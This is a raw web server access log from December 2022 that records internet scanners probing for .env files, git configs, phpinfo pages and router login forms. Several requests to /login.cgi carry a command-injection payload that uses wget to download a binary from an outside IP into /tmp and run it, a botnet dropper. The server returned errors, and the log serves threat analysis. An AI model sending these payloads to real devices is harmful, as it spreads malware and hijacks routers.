54.161.76.154 - - [02/Dec/2022:00:09:28 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.25.1"
141.255.166.2 - - [02/Dec/2022:00:10:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.246.221.101 - - [02/Dec/2022:00:13:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
34.76.158.233 - - [02/Dec/2022:00:13:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
35.195.93.98 - - [02/Dec/2022:00:14:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
185.246.221.101 - - [02/Dec/2022:00:14:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
183.136.225.32 - - [02/Dec/2022:00:15:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:00:15:36 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:00:15:39 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
54.161.76.154 - - [02/Dec/2022:00:28:06 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "python-requests/2.25.1"
80.94.92.40 - - [02/Dec/2022:00:28:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
84.21.172.205 - - [02/Dec/2022:00:32:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
177.67.12.68 - - [02/Dec/2022:00:33:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
117.196.232.203 - - [02/Dec/2022:00:35:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
117.196.232.203 - - [02/Dec/2022:00:35:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
120.86.253.120 - - [02/Dec/2022:00:35:47 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
162.221.192.26 - - [02/Dec/2022:00:42:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
173.214.175.178 - - [02/Dec/2022:00:42:35 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
111.118.40.97 - - [02/Dec/2022:00:45:19 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
80.94.92.40 - - [02/Dec/2022:00:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
173.214.175.178 - - [02/Dec/2022:00:49:25 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
128.14.141.34 - - [02/Dec/2022:00:52:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.91.47.43 - - [02/Dec/2022:00:53:26 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
84.21.172.128 - - [02/Dec/2022:00:53:57 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
80.94.92.40 - - [02/Dec/2022:00:54:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.94.92.40 - - [02/Dec/2022:00:55:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.94.92.40 - - [02/Dec/2022:01:03:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
183.136.225.32 - - [02/Dec/2022:01:10:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [02/Dec/2022:01:18:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:01:18:17 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:01:18:19 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
205.210.31.142 - - [02/Dec/2022:01:19:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
84.21.172.128 - - [02/Dec/2022:01:21:16 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
80.94.92.40 - - [02/Dec/2022:01:23:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.94.92.40 - - [02/Dec/2022:01:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.94.92.40 - - [02/Dec/2022:01:24:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
62.233.50.179 - - [02/Dec/2022:01:26:47 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:01:26:47 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:01:26:47 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:01:26:47 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:01:26:47 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:01:26:47 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:01:26:47 +0100] "\x03" 501 316 "-" "-"
85.209.134.96 - - [02/Dec/2022:01:28:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:01:31:38 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.246.221.101 - - [02/Dec/2022:01:33:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
80.94.92.40 - - [02/Dec/2022:01:37:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.246.221.101 - - [02/Dec/2022:01:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
141.255.166.2 - - [02/Dec/2022:01:44:51 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
87.236.176.59 - - [02/Dec/2022:01:45:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
141.255.166.2 - - [02/Dec/2022:01:45:41 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [02/Dec/2022:01:50:23 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [02/Dec/2022:01:50:32 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
64.62.197.220 - - [02/Dec/2022:01:51:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
185.225.16.43 - - [02/Dec/2022:01:51:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:01:52:32 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
80.94.92.40 - - [02/Dec/2022:01:53:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.225 - - [02/Dec/2022:01:54:28 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
185.225.16.43 - - [02/Dec/2022:01:55:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
173.214.175.178 - - [02/Dec/2022:02:00:58 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
185.225.16.43 - - [02/Dec/2022:02:01:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
84.21.172.205 - - [02/Dec/2022:02:04:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
51.254.59.113 - - [02/Dec/2022:02:04:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
121.180.14.137 - - [02/Dec/2022:02:04:40 +0100] "POST /UD/act?1 HTTP/1.1" 400 329 "-" "tbox/1.0"
173.214.175.178 - - [02/Dec/2022:02:06:22 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
183.136.225.32 - - [02/Dec/2022:02:14:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [02/Dec/2022:02:22:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:02:22:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:02:23:03 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
198.235.24.2 - - [02/Dec/2022:02:24:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:29:00 +0100] "GET /.env HTTP/1.1" 404 309 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:29:00 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:29:00 +0100] "GET /phpinfo HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:29:02 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:29:03 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:29:03 +0100] "GET /php.php HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:29:04 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "-"
128.1.248.42 - - [02/Dec/2022:02:32:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
223.130.30.235 - - [02/Dec/2022:02:36:09 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
193.47.61.121 - - [02/Dec/2022:02:38:38 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
132.145.39.16 - - [02/Dec/2022:02:47:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:48:00 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:48:01 +0100] "GET /phpinfo HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:48:02 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:48:03 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:48:04 +0100] "GET /php.php HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:48:06 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "-"
167.248.133.63 - - [02/Dec/2022:02:48:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.63 - - [02/Dec/2022:02:48:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.63 - - [02/Dec/2022:02:48:19 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.63 - - [02/Dec/2022:02:48:19 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
5.189.170.101 - - [02/Dec/2022:02:50:38 +0100] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
132.145.39.16 - - [02/Dec/2022:02:50:57 +0100] "GET /.env HTTP/1.1" 404 309 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:50:58 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:50:59 +0100] "GET /phpinfo HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:51:01 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:51:01 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:51:03 +0100] "GET /php.php HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:02:51:04 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "-"
162.221.192.26 - - [02/Dec/2022:02:52:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.248.133.117 - - [02/Dec/2022:02:53:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.117 - - [02/Dec/2022:02:53:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.117 - - [02/Dec/2022:02:53:41 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.117 - - [02/Dec/2022:02:53:41 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.60 - - [02/Dec/2022:02:54:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.60 - - [02/Dec/2022:02:54:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.60 - - [02/Dec/2022:02:54:17 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.60 - - [02/Dec/2022:02:54:17 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
141.255.166.2 - - [02/Dec/2022:03:01:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
132.145.39.16 - - [02/Dec/2022:03:08:51 +0100] "GET /.env HTTP/1.1" 404 309 "-" "-"
132.145.39.16 - - [02/Dec/2022:03:08:52 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "-"
132.145.39.16 - - [02/Dec/2022:03:08:53 +0100] "GET /phpinfo HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:03:08:55 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "-"
132.145.39.16 - - [02/Dec/2022:03:08:56 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "-"
132.145.39.16 - - [02/Dec/2022:03:08:57 +0100] "GET /php.php HTTP/1.1" 404 312 "-" "-"
132.145.39.16 - - [02/Dec/2022:03:08:57 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "-"
141.255.166.2 - - [02/Dec/2022:03:13:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
194.55.186.216 - - [02/Dec/2022:03:13:32 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
164.52.54.35 - - [02/Dec/2022:03:13:36 +0100] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.54.35 - - [02/Dec/2022:03:13:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:03:13:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
193.47.61.121 - - [02/Dec/2022:03:13:45 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
164.52.54.35 - - [02/Dec/2022:03:13:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:03:13:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
164.52.54.35 - - [02/Dec/2022:03:13:54 +0100] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.54.35 - - [02/Dec/2022:03:13:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:03:14:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:03:14:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.52.54.35 - - [02/Dec/2022:03:14:13 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
159.203.69.69 - - [02/Dec/2022:03:15:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
167.250.163.58 - - [02/Dec/2022:03:16:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
194.55.186.216 - - [02/Dec/2022:03:17:34 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
111.20.101.8 - - [02/Dec/2022:03:23:17 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
36.95.189.91 - - [02/Dec/2022:03:23:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
141.255.166.2 - - [02/Dec/2022:03:23:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:03:24:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
1.169.171.86 - - [02/Dec/2022:03:26:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
71.6.146.130 - - [02/Dec/2022:03:26:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.146.130 - - [02/Dec/2022:03:26:16 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
71.6.146.130 - - [02/Dec/2022:03:26:17 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
71.6.146.130 - - [02/Dec/2022:03:26:17 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
71.6.146.130 - - [02/Dec/2022:03:26:19 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
141.255.166.2 - - [02/Dec/2022:03:27:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:03:28:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:03:30:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
167.94.146.57 - - [02/Dec/2022:03:30:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.57 - - [02/Dec/2022:03:30:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.57 - - [02/Dec/2022:03:30:20 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.57 - - [02/Dec/2022:03:30:20 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
141.255.166.2 - - [02/Dec/2022:03:31:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
81.157.1.64 - - [02/Dec/2022:03:34:36 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
141.255.166.2 - - [02/Dec/2022:03:35:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
177.54.61.245 - - [02/Dec/2022:03:36:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
194.55.186.216 - - [02/Dec/2022:03:36:51 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
